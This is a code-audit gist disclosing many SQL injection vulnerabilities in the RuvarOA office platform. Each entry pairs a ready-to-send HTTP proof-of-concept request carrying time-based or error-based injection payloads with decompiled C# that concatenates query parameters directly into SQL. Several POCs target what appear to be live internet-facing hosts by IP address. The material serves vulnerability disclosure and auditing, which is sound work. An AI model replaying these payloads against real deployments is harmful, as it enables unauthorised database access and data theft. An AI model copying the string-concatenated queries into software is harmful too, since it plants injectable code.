Skip to content

Instantly share code, notes, and snippets.

@Mr-xn

Mr-xn/RuvarOA.md Secret

Created February 6, 2024 10:55
Show Gist options
  • Save Mr-xn/bc8261a5c3e35a72768723acf1da358d to your computer and use it in GitHub Desktop.
Save Mr-xn/bc8261a5c3e35a72768723acf1da358d to your computer and use it in GitHub Desktop.
RuvarOA code review notes

Vendor

Guangzhou Luhua Information Technology Co., Ltd.

HomePage

http://www.ruvar.net | http://m.ruvar.com/

Fofa Query

app="RUVAROA-Cooperative-Office-Platform" link

Products Affected

RuvarOA V6.01 、RuvarOA V12.01

Description

During the code audit of the RuvarOA system, I discovered multiple vulnerabilities. Including dozens of SQL injection vulnerabilities (unauthorized in the frontend), multiple unauthorized access vulnerabilities, multiple XSS vulnerabilities, several sensitive information disclosure vulnerabilities, and one system design flaw vulnerability.

SQl Injection

plan_template_preview.aspx

path

/WorkPlan/plan_template_preview.aspx

POC

GET /WorkPlan/plan_template_preview.aspx?template_id=1+and+(select+@@version)>0+--+ HTTP/1.1
Host: 112.74.79.113:8000
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-HK;q=0.8,zh-TW;q=0.7,zh-CN;q=0.6,zh;q=0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7


image

Vulnerability analysis

function plan_template_preview within the DLL file /RuvarOA/bin/WorkPlan.dll

using System;
using System.Data;
using System.Web.UI;
using System.Web.UI.HtmlControls;
using System.Web.UI.WebControls;
using Lib;

namespace WorkPlan;

public class plan_template_preview : Page
{
    protected HtmlHead Head1;

    protected HtmlForm form1;

    protected HtmlGenericControl divContent;

    protected TextBox txt_template_formula;

    protected TextBox txt_template_sumfield;

    protected void Page_Load(object sender, EventArgs e)
    {
        DataView dataView = SqlHelper.QueryView("select top 1 * from workplan_template_info where id=" + ((Page)this).Request.QueryString["template_id"]);
        if (dataView.Count > 0)
        {
            txt_template_formula.Text = dataView[0]["template_formula"].ToString();
            txt_template_sumfield.Text = dataView[0]["template_sumfield"].ToString();
            ((Page)this).Title = dataView[0]["template_title"].ToString() + " -- 模版预览";
            ((HtmlContainerControl)divContent).InnerHtml = dataView[0]["template_content"].ToString();
        }
        dataView.Dispose();
    }
}

The direct use of Request.QueryString["template_id"] to retrieve a value and then concatenate it into an SQL statement has resulted in an SQL injection vulnerability.

bulletin_template_show.aspx

path

bulletin/bulletin_template_show.aspx

POC

GET /bulletin/bulletin_template_show.aspx?id=1 HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.4103.116 Safari/537.36
Host: 112.74.79.113:8000
Accept: */*
Accept-Encoding: gzip, deflate, br
Connection: close


Vulnerability analysis

function bulletin_template_show within the DLL file /RuvarOA/bin/bulletin.dll

using System;
using System.Data;
using System.Web.UI;
using System.Web.UI.HtmlControls;
using System.Web.UI.WebControls;
using Lib;

namespace bulletin;

public class bulletin_template_show : Page
{
    protected HtmlForm Form1;

    protected HtmlGenericControl divTitle;

    protected HtmlGenericControl divContent;

    protected Literal lt_visible;

    protected TextBox txt_id;

    protected void Page_Load(object sender, EventArgs e)
    {
        if (!((Page)this).IsPostBack)
        {
            txt_id.Text = ((Page)this).Request.QueryString["id"];
            if (Validate.isNullOrSpace(txt_id.Text))
            {
                txt_id.Text = "0";
            }
            DataView dataView = SqlHelper.QueryView("select top 1 * from office_bulletin_template where id=" + txt_id.Text);
            if (dataView.Count > 0)
            {
                ((HtmlContainerControl)divTitle).InnerHtml = dataView[0]["b_title"].ToString();
                ((HtmlContainerControl)divContent).InnerHtml = dataView[0]["b_content"].ToString();
            }
            dataView.Dispose();
        }
    }
}


The direct use of Request.QueryString["id"] to retrieve a value and then concatenate it into an SQL statement has resulted in an SQL injection vulnerability.

wf_file_download.aspx

path

Mobile/WorkFlow/wf_file_download.aspx

POC

GET /Mobile/WorkFlow/wf_file_download.aspx?attach_type=1&sys_file_storage_id=1+waitfor+delay+'0:0:3'+--+ HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.4103.116 Safari/537.36
Host: 121.33.254.78:88
Accept: */*
Accept-Encoding: gzip, deflate, br
Connection: close


image

Vulnerability analysis

function wf_file_download within the DLL file /RuvarOA/bin/Mobile.dll

public class wf_file_download : Page
{
    protected void Page_Load(object sender, EventArgs e)
    {
        if (((Control)this).Page.IsPostBack)
        {
            return;
        }
        try
        {
            string text = "";
            text = ((Page)this).Request.QueryString["sys_file_storage_id"];
            string text2 = ((Page)this).Request.QueryString["attach_type"];
            if (Validate.isNullOrSpace(text2))
            {
                text2 = "0";
            }
            if (text2 == "1")
            {
                string sQLString = "SELECT * FROM wf_office_file WHERE word_file_id=" + text + "  ";
                DataView dataView = SqlHelper.QueryView(sQLString);
                if (dataView.Count > 0)
                {
                    byte[] array = (byte[])dataView[0]["filedata"];
                    dataView.Dispose();
                    ((Page)this).Response.Clear();
                    ((Control)this).Page.Response.ContentType = "application/msword";
                    ((Control)this).Page.Response.AddHeader("Content-Disposition", "attachment; filename=zhengwen.doc;");
                    ((Page)this).Response.BinaryWrite(array);
                }
                dataView.Dispose();
                return;
            }
            if (text != "" && text != null)
            {
                FileDownLoad fileDownLoad = new FileDownLoad();
                fileDownLoad.DownLoad(((Control)this).Page, text);
                return;
            }
            string text3 = "";
            string text4 = "";
            string text5 = "";
            text3 = ((Page)this).Request.QueryString["table_id"];
            text4 = ((Page)this).Request.QueryString["table_name"];
            text5 = ((Page)this).Request.QueryString["upload_type"];
            if (text3 != "" && text3 != null && text4 != "" && text4 != null)
            {
                FileDownLoad fileDownLoad = new FileDownLoad();
                if (text5 == "" || text5 == null)
                {
                    fileDownLoad.DownLoad(((Control)this).Page, text4, text3);
                }
                else
                {
                    fileDownLoad.DownLoad(((Control)this).Page, text4, text3, text5);
                }
            }
        }
        catch
        {
        }
    }


The direct use of Request.QueryString["sys_file_storage_id"] to retrieve a value and then concatenate it into an SQL statement has resulted in an SQL injection vulnerability. But need attach_type value 1.

address_public_show.aspx

path

AddressBook/address_public_show.aspx

POC

GET /AddressBook/address_public_show.aspx?id=1+waitfor+delay+'0:0:3'+--+ HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.4103.116 Safari/537.36
Host: 121.33.254.78:88
Accept: */*
Accept-Encoding: gzip, deflate, br
Connection: close


Vulnerability analysis

function address_public_show within the DLL file /RuvarOA/bin/AddressBook.dll

using System;
using System.Data;
using System.Web.UI;
using System.Web.UI.HtmlControls;
using System.Web.UI.WebControls;
using Lib;

namespace AddressBook;

public class address_public_show : Page
{
    protected HtmlForm form1;

    protected Literal txt_cm_name;

    protected Literal txt_type_name;

    protected Literal txt_cm_sez;

    protected Literal txt_cm_ename;

    protected Literal txt_cm_company;

    protected Literal txt_cm_nameas;

    protected Literal txt_cm_department_name;

    protected Literal txt_cm_wife;

    protected Literal txt_cm_position_name;

    protected Literal txt_cm_birth;

    protected Literal txt_cm_tel;

    protected Literal txt_cm_fax;

    protected Literal txt_cm_mobile;

    protected Literal txt_cm_tel1;

    protected Literal txt_cm_oicq;

    protected Literal txt_cm_msn;

    protected Literal txt_cm_email;

    protected Literal txt_cm_email1;

    protected Literal txt_cm_url;

    protected Literal txt_cm_companyurl;

    protected Literal txt_cm_address;

    protected Literal txt_cm_companyaddr;

    protected Literal txt_cm_postcode;

    protected Literal txt_cm_companycode;

    protected Literal txt_cm_interest;

    protected Literal txt_cm_memo;

    protected void Page_Load(object sender, EventArgs e)
    {
        Common.CheckSession();
        if (!Users.Check_Power(((Page)this).Session["sn_sys_userinfo_id"].ToString(), "1092", "6"))
        {
            Common.DealError(((Control)this).Page, "对不起,您没有访问权限!");
            ((Page)this).Response.End();
        }
        if (!((Page)this).IsPostBack)
        {
            string text = ((Page)this).Request.QueryString["id"];
            if (Validate.isNullOrSpace(text))
            {
                text = "0";
            }
            string sQLString = "select * from address_book where id=" + text;
            DataView dataView = SqlHelper.QueryView(sQLString);
            if (dataView.Count > 0)
            {
                txt_type_name.Text = dataView[0]["type_name"].ToString();
                txt_cm_name.Text = dataView[0]["cm_name"].ToString();
                txt_cm_ename.Text = dataView[0]["cm_ename"].ToString();
                txt_cm_birth.Text = dataView[0]["cm_birth"].ToString();
                txt_cm_sez.Text = dataView[0]["cm_sex"].ToString();
                txt_cm_company.Text = dataView[0]["cm_company"].ToString();
                txt_cm_department_name.Text = dataView[0]["cm_department_name"].ToString();
                txt_cm_position_name.Text = dataView[0]["cm_position_name"].ToString();
                txt_cm_tel.Text = dataView[0]["cm_tel"].ToString();
                txt_cm_mobile.Text = dataView[0]["cm_mobile"].ToString();
                txt_cm_email.Text = dataView[0]["cm_email"].ToString();
                txt_cm_url.Text = dataView[0]["cm_url"].ToString();
                txt_cm_address.Text = dataView[0]["cm_address"].ToString();
                txt_cm_postcode.Text = dataView[0]["cm_postcode"].ToString();
                txt_cm_email1.Text = dataView[0]["cm_email1"].ToString();
                txt_cm_tel1.Text = dataView[0]["cm_tel1"].ToString();
                txt_cm_fax.Text = dataView[0]["cm_fax"].ToString();
                txt_cm_oicq.Text = dataView[0]["cm_oicq"].ToString();
                txt_cm_msn.Text = dataView[0]["cm_msn"].ToString();
                txt_cm_nameas.Text = dataView[0]["cm_nameas"].ToString();
                txt_cm_wife.Text = dataView[0]["cm_wife"].ToString();
                txt_cm_memo.Text = dataView[0]["cm_memo"].ToString();
                txt_cm_interest.Text = dataView[0]["cm_interest"].ToString();
                txt_cm_companyaddr.Text = dataView[0]["cm_companyaddr"].ToString();
                txt_cm_companyurl.Text = dataView[0]["cm_companyurl"].ToString();
                txt_cm_companycode.Text = dataView[0]["cm_companycode"].ToString();
            }
            dataView.Dispose();
        }
    }
}

The direct use of Request.QueryString["id"] to retrieve a value and then concatenate it into an SQL statement has resulted in an SQL injection vulnerability.

address_public_new.aspx

path

AddressBook/address_public_new.aspx

POC

GET /AddressBook/address_public_new.aspx?id=1+waitfor+delay+'0:0:3'+--+ HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.4103.116 Safari/537.36
Host: 118.190.16.8:8099
Accept: */*
Accept-Encoding: gzip, deflate, br
Connection: close



Vulnerability analysis

function address_public_new within the DLL file /RuvarOA/bin/AddressBook.dll

using System;
using System.Data;
using System.Data.Common;
using System.Data.SqlClient;
using System.Text;
using System.Web.UI;
using System.Web.UI.HtmlControls;
using System.Web.UI.WebControls;
using Lib;

namespace AddressBook;

public class address_public_new : Page
{
    protected HtmlForm form1;

    protected TextBox txt_cm_name;

    protected DropDownList ddl_type;

    protected RadioButtonList rd_cm_sex;

    protected TextBox txt_cm_ename;

    protected TextBox txt_cm_company;

    protected TextBox txt_cm_nameas;

    protected TextBox txt_cm_department_name;

    protected TextBox txt_cm_wife;

    protected TextBox txt_cm_position_name;

    protected TextBox txt_cm_birth;

    protected TextBox txt_cm_tel;

    protected TextBox txt_cm_fax;

    protected TextBox txt_cm_mobile;

    protected TextBox txt_cm_tel1;

    protected TextBox txt_cm_oicq;

    protected TextBox txt_cm_msn;

    protected TextBox txt_cm_email;

    protected TextBox txt_cm_email1;

    protected TextBox txt_cm_url;

    protected TextBox txt_cm_companyurl;

    protected TextBox txt_cm_address;

    protected TextBox txt_cm_companyaddr;

    protected TextBox txt_cm_postcode;

    protected TextBox txt_cm_companycode;

    protected TextBox txt_cm_interest;

    protected TextBox txt_cm_memo;

    protected Button btnSave;

    protected TextBox txt_id;

    protected void Page_Load(object sender, EventArgs e)
    {
        Common.CheckSession();
        if (!Users.Check_Power(((Page)this).Session["sn_sys_userinfo_id"].ToString(), "1092", "1"))
        {
            Common.DealError(((Control)this).Page, "对不起,您没有访问权限!");
            ((Page)this).Response.End();
        }
        if (!((Page)this).IsPostBack)
        {
            txt_id.Text = ((Page)this).Request.QueryString["id"];
            if (Validate.isNullOrSpace(txt_id.Text))
            {
                txt_id.Text = "0";
            }
            InitType();
            if (txt_id.Text != "0")
            {
                ShowInfo();
            }
            ((WebControl)btnSave).Attributes["onclick"] = "return checkSave();";
        }
    }

    private void InitType()
    {
        //IL_004a: Unknown result type (might be due to invalid IL or missing references)
        //IL_0054: Expected O, but got Unknown
        string sQLString = "select * from address_book_type where flag=0 order by type_order asc ";
        DataView dataView = SqlHelper.QueryView(sQLString);
        for (int i = 0; i < dataView.Count; i++)
        {
            ((ListControl)ddl_type).Items.Add(new ListItem(dataView[i]["type_name"].ToString(), dataView[i]["id"].ToString()));
        }
        dataView.Dispose();
    }

    private void ShowInfo()
    {
        string sQLString = "select * from address_book where id=" + txt_id.Text;
        DataView dataView = SqlHelper.QueryView(sQLString);
        if (dataView.Count > 0)
        {
            Common.SelectedItem(ddl_type, dataView[0]["type_id"].ToString());
            txt_cm_name.Text = dataView[0]["cm_name"].ToString();
            txt_cm_ename.Text = dataView[0]["cm_ename"].ToString();
            txt_cm_birth.Text = dataView[0]["cm_birth"].ToString();
            Common.SelectedItem(rd_cm_sex, dataView[0]["cm_sex"].ToString());
            txt_cm_company.Text = dataView[0]["cm_company"].ToString();
            txt_cm_department_name.Text = dataView[0]["cm_department_name"].ToString();
            txt_cm_position_name.Text = dataView[0]["cm_position_name"].ToString();
            txt_cm_tel.Text = dataView[0]["cm_tel"].ToString();
            txt_cm_mobile.Text = dataView[0]["cm_mobile"].ToString();
            txt_cm_email.Text = dataView[0]["cm_email"].ToString();
            txt_cm_email1.Text = dataView[0]["cm_email1"].ToString();
            txt_cm_tel1.Text = dataView[0]["cm_tel1"].ToString();
            txt_cm_url.Text = dataView[0]["cm_url"].ToString();
            txt_cm_address.Text = dataView[0]["cm_address"].ToString();
            txt_cm_postcode.Text = dataView[0]["cm_postcode"].ToString();
            txt_cm_fax.Text = dataView[0]["cm_fax"].ToString();
            txt_cm_oicq.Text = dataView[0]["cm_oicq"].ToString();
            txt_cm_msn.Text = dataView[0]["cm_msn"].ToString();
            txt_cm_nameas.Text = dataView[0]["cm_nameas"].ToString();
            txt_cm_wife.Text = dataView[0]["cm_wife"].ToString();
            txt_cm_memo.Text = dataView[0]["cm_memo"].ToString();
            txt_cm_interest.Text = dataView[0]["cm_interest"].ToString();
            txt_cm_companyaddr.Text = dataView[0]["cm_companyaddr"].ToString();
            txt_cm_companyurl.Text = dataView[0]["cm_companyurl"].ToString();
            txt_cm_companycode.Text = dataView[0]["cm_companycode"].ToString();
        }
        dataView.Dispose();
    }

IF Request.QueryString["id"] value not equal 0 or null ,then go to ShowInfo() function. The direct use of Request.QueryString["id"] to retrieve a value and then concatenate it into an SQL statement has resulted in an SQL injection vulnerability.

kaizen_download.aspx

path

CorporateCulture/kaizen_download.aspx

POC

GET /CorporateCulture/kaizen_download.aspx?file_id=')+and+(select+@@version)>0+--+(' HTTP/1.1
Host: 112.74.79.113:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.4103.116 Safari/537.36


image

Vulnerability analysis

function kaizen_download within the DLL file /RuvarOA/bin/CorporateCulture.dll

using System;
using System.Data.Common;
using System.Data.SqlClient;
using System.Web.UI;
using Lib;

namespace CorporateCulture;

public class kaizen_download : Page
{
    protected void Page_Load(object sender, EventArgs e)
    {
        string text = ((Page)this).Request.QueryString["file_id"];
        string text2 = "select top 1 * from kaizen_list where (file_id='" + text + "')order by file_id desc";
        if (text2 != "")
        {
            SqlDataReader val = SqlHelper.ExecuteReader(text2);
            while (((DbDataReader)(object)val).Read())
            {
                byte[] array = new byte[((DbDataReader)(object)val).GetBytes(12, 0L, (byte[]?)null, 0, int.MaxValue)];
                ((DbDataReader)(object)val).GetBytes(12, 0L, array, 0, array.Length);
                ((Control)this).Page.Response.ContentType = ((DbDataReader)(object)val)["file_type"].ToString();
                ((Control)this).Page.Response.AddHeader("Content-Disposition", "filename=" + DateTime.Now.ToString("yyyyMMddHHmmss") + ((DbDataReader)(object)val)["file_ext"].ToString() + ";");
                ((Control)this).Page.Response.BinaryWrite(array);
            }
            ((DbDataReader)(object)val).Close();
        }
    }
}

The direct use of Request.QueryString["file_id"] to retrieve a value and then concatenate it into an SQL statement has resulted in an SQL injection vulnerability.

AttachDownLoad.aspx

path

Mobile/Bulletin/AttachDownLoad.aspx

POC

GET /Mobile/Bulletin/AttachDownLoad.aspx?attach_id=1')+and+(select+@@version)>0+--+(' HTTP/1.1
Host: 112.74.79.113:8000
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-HK;q=0.8,zh-TW;q=0.7,zh-CN;q=0.6,zh;q=0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7


image

Vulnerability analysis

function AttachDownLoad within the DLL file /RuvarOA/bin/Mobile.dll

using System;
using System.Data.Common;
using System.Data.SqlClient;
using System.Text;
using System.Text.RegularExpressions;
using System.Web;
using System.Web.UI;
using Lib;

namespace Mobile.Bulletin;

public class AttachDownLoad : Page
{
    protected void Page_Load(object sender, EventArgs e)
    {
        if (((Control)this).Page.IsPostBack)
        {
            return;
        }
        try
        {
            string text = ((Page)this).Request.QueryString["attach_id"];
            if (Validate.isNullOrSpace(text))
            {
                text = "0";
            }
            if (!(text != "") || text == null)
            {
                return;
            }
            string text2 = "";
            text2 = "select top 1 file_name,file_type,file_ext,file_size,file_bin_data from office_bulletin_attach where (attach_id='" + text + "') order by attach_id desc";
            if (text2 != "")
            {
                SqlDataReader val = SqlHelper.ExecuteReader(text2);
                if (((DbDataReader)(object)val).Read())
                {
                    string text3 = ((DbDataReader)(object)val)["file_name"].ToString();
                    text3 = text3.Trim();
                    text3 = Regex.Replace(Regex.Replace(text3, "^\"+", ""), "\"+$", "");
                    text3 = Regex.Replace(text3, ".[a-zA-Z0-9]*$", "");
                    text3 += ((DbDataReader)(object)val)["file_ext"].ToString().Replace("\"", "");
                    text3 = Regex.Replace(text3, "[/\\*?:\"<>]*", "");
                    byte[] array = new byte[((DbDataReader)(object)val).GetBytes(4, 0L, (byte[]?)null, 0, int.MaxValue)];
                    ((DbDataReader)(object)val).GetBytes(4, 0L, array, 0, array.Length);
                    ((Page)this).Response.Clear();
                    ((Page)this).Response.ContentType = ((DbDataReader)(object)val)["file_type"].ToString();
                    ((Page)this).Response.AddHeader("Content-Disposition", "attachment; filename=" + HttpUtility.UrlEncode(text3, Encoding.UTF8) + ";");
                    ((Page)this).Response.BinaryWrite(array);
                }
                ((DbDataReader)(object)val).Close();
            }
        }
        catch (Exception ex)
        {
            ((Page)this).Response.Write(ex.ToString());
        }
    }
}

The direct use of Request.QueryString["attach_id"] to retrieve a value and then concatenate it into an SQL statement has resulted in an SQL injection vulnerability.

AttachDown.aspx

path

Mobile/LHMail/AttachDown.aspx

POC

GET /Mobile/LHMail/AttachDown.aspx?email_attach_id=1')+waitfor+delay+'0:0:3'+--+ HTTP/1.1
Host: 112.74.79.113:8000
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-HK;q=0.8,zh-TW;q=0.7,zh-CN;q=0.6,zh;q=0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7


image
GET /Mobile/LHMail/AttachDown.aspx?contentid=1')+waitfor+delay+'0:0:3'+--+ HTTP/1.1
Host: 112.74.79.113:8000
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-HK;q=0.8,zh-TW;q=0.7,zh-CN;q=0.6,zh;q=0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7


image

Vulnerability analysis

function AttachDownLoad within the DLL file /RuvarOA/bin/Mobile.dll

using System;
using System.Web.UI;
using Lib;
using WebUtility;

namespace Mobile.LHMail;

public class AttachDownLoad : BasePageInfo
{
    protected void Page_Load(object sender, EventArgs e)
    {
        if (((Control)this).Page.IsPostBack)
        {
            return;
        }
        try
        {
            string text = ((Page)this).Request.QueryString["email_attach_id"];
            if (Validate.isNullOrSpace(text))
            {
                text = "0";
            }
            if (text != "" && text != null)
            {
                FileDownLoad.DownLoadEmailAttach(int.Parse(text));
                return;
            }
            text = ((Page)this).Request.QueryString["contentid"];
            if (text != "" && text != null)
            {
                FileDownLoad.DownLoadEmailAttach(text);
            }
        }
        catch
        {
        }
    }
}

The direct use of Request.QueryString["email_attach_id"] and Request.QueryString["contentid"] to retrieve a value and then concatenate it into an SQL statement has resulted in an SQL injection vulnerability.

wf_work_finish_file_down.aspx

path

Mobile/WorkFlow/wf_work_finish_file_down.aspx

POC

GET /Mobile/WorkFlow/wf_work_finish_file_down.aspx?sys_file_storage_id=1'+waitfor+delay+'0:0:3'+--+ HTTP/1.1
Host: 121.33.254.78:88
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-HK;q=0.8,zh-TW;q=0.7,zh-CN;q=0.6,zh;q=0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7


Vulnerability analysis

function wf_work_finish_file_down within the DLL file /RuvarOA/bin/Mobile.dll

using System;
using System.Data.Common;
using System.Data.SqlClient;
using System.Text;
using System.Web;
using System.Web.UI;
using Lib;

namespace Mobile.WorkFlow;

public class wf_work_finish_file_down : Page
{
    protected void Page_Load(object sender, EventArgs e)
    {
        if (((Control)this).Page.IsPostBack)
        {
            return;
        }
        try
        {
            string dbname = ((Page)this).Request.QueryString["dbname"];
            string text = "";
            text = ((Page)this).Request.QueryString["sys_file_storage_id"];
            BackUpDB backUpDB = new BackUpDB(dbname);
            if (!(text != "") || text == null)
            {
                return;
            }
            string text2 = "";
            string text3 = "";
            string text4 = "";
            text2 = "select top 1 * from sys_file_storage where (sys_file_storage_id='" + text + "')order by sys_file_storage_id desc";
            if (!(text2 != ""))
            {
                return;
            }
            SqlDataReader val = backUpDB.QueryDataReader(text2);
            while (((DbDataReader)(object)val).Read())
            {
                text4 = ((DbDataReader)(object)val)["file_type"].ToString();
                text3 = ((DbDataReader)(object)val)["file_name"].ToString();
                text3 = GetFileName(text3);
                byte[] array = new byte[((DbDataReader)(object)val).GetBytes(12, 0L, (byte[]?)null, 0, int.MaxValue)];
                ((DbDataReader)(object)val).GetBytes(12, 0L, array, 0, array.Length);
                ((Control)this).Page.Response.ContentType = text4;
                if (text4.IndexOf("image") > -1 || text4.IndexOf("flash") > -1)
                {
                    ((Control)this).Page.Response.AddHeader("Content-Disposition", "filename=" + HttpUtility.UrlEncode(text3, Encoding.UTF8) + ";");
                }
                else
                {
                    ((Control)this).Page.Response.AddHeader("Content-Disposition", "attachment; filename=" + HttpUtility.UrlEncode(text3, Encoding.UTF8) + ";");
                }
                ((Control)this).Page.Response.BinaryWrite(array);
            }
            ((DbDataReader)(object)val).Close();
            ((DbDataReader)(object)val).Dispose();
        }
        catch
        {
        }
    }

    private string GetFileName(string file_name)
    {
        int num = 0;
        int num2 = 16;
        string[] array = file_name.Split(new char[1] { '.' });
        if (array.Length == 2)
        {
            num = Common.getLength(array[0]);
            if (num > num2)
            {
                file_name = Common.getLengthEx(array[0], num2, "") + "." + array[1];
            }
        }
        return file_name;
    }

    protected override void OnInit(EventArgs e)
    {
        InitializeComponent();
        ((Page)this).OnInit(e);
    }

    private void InitializeComponent()
    {
    }
}

The direct use of Request.QueryString["sys_file_storage_id"] to retrieve a value and then concatenate it into an SQL statement has resulted in an SQL injection vulnerability.

wf_template_child_field_list.aspx

path

SysManage/wf_template_child_field_list.aspx

POC

GET /SysManage/wf_template_child_field_list.aspx?template_id=@@version HTTP/1.1
Host: 112.74.79.113:8000
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-HK;q=0.8,zh-TW;q=0.7,zh-CN;q=0.6,zh;q=0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7


image

Vulnerability analysis

function wf_template_child_field_list within the DLL file /RuvarOA/bin/SysManage.dll

    {
        if (!((Control)this).Page.IsPostBack)
        {
            txt_template_id.Text = ((Page)this).Request.QueryString["template_id"];
            initField();
            ((WebControl)btnSave).Attributes["onclick"] = "return checkSave();";
        }
    }

....
DataView dataView = SqlHelper.QueryView("select * from office_missive_template_child_fields where template_id=" + txt_template_id.Text);

The direct use of Request.QueryString["template_id"] to retrieve a value and then concatenate it into an SQL statement has resulted in an SQL injection vulnerability.

sys_blogtemplate_new.aspx

path

SysManage/sys_blogtemplate_new.aspx

POC

GET /SysManage/sys_blogtemplate_new.aspx?id=@@version HTTP/1.1
Host: 112.74.79.113:8000
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-HK;q=0.8,zh-TW;q=0.7,zh-CN;q=0.6,zh;q=0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7


image

Vulnerability analysis

function sys_blogtemplate_new within the DLL file /RuvarOA/bin/SysManage.dll

using System;
using System.Data;
using System.Data.Common;
using System.Data.SqlClient;
using System.Text;
using System.Web.UI;
using System.Web.UI.HtmlControls;
using System.Web.UI.WebControls;
using Lib;

namespace SysManage;

public class sys_blogtemplate_new : Page
{
    protected HtmlForm form1;

    protected TextBox txt_blog_title;

    protected Button btnSave;

    protected Button btnDelete;

    protected TextBox txt_blog_content;

    protected TextBox txt_id;

    protected void Page_Load(object sender, EventArgs e)
    {
        if (!((Page)this).IsPostBack)
        {
            txt_id.Text = ((Page)this).Request.QueryString["id"];
            if (Validate.isNullOrSpace(txt_id.Text))
            {
                txt_id.Text = "0";
            }
            DataView dataView = SqlHelper.QueryView("select top 1 * from self_worklog_template where id=" + txt_id.Text);
            if (dataView.Count > 0)
            {
                txt_blog_content.Text = dataView[0]["blog_content"].ToString();
                txt_blog_title.Text = dataView[0]["blog_title"].ToString();
            }
            dataView.Dispose();
            ((WebControl)btnSave).Attributes["onclick"] = "return Check();";
            ((WebControl)btnDelete).Attributes["onclick"] = "return confirm('确定要删除吗?');";
        }
    }

The direct use of Request.QueryString["id"] to retrieve a value and then concatenate it into an SQL statement has resulted in an SQL injection vulnerability.

MF.aspx

path

WebUtility/MF.aspx

POC

POST /WebUtility/MF.aspx HTTP/1.1
Host: 112.74.79.113:8000
Content-Length: 187
Cache-Control: max-age=0
Origin: http://112.74.79.113:8000
DNT: 1
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5807.225 Safari/537.36 Edg/112.0.1791.33
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://112.74.79.113:8000/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9,zh-HK;q=0.8,zh-TW;q=0.7,zh-CN;q=0.6,zh;q=0.5
Connection: close

__VIEWSTATE=%2FwEPDwUKMTQzODQ2ODU2NGRkIOnIdBvx8FdC98ZQVziWZAsTeOJOxTvwmwGbcAdrOUw%3D&tbTable=1'+and+(select+@@version)>0+--+&tbPageID=1&btnMake=%E7%94%9F%E6%88%90%E8%AF%AD%E5%8F%A5&tbSql=
image

Vulnerability analysis

function MakeSql within the DLL file /RuvarOA/bin/WebUtility.dll

protected void Page_Load(object sender, EventArgs e)
{
    if (!((Page)this).IsPostBack)
    {
        tbTable.Text = ((Page)this).Request.QueryString["table"];
        if (tbTable.Text != "")
        {
            MakeSql();
        }
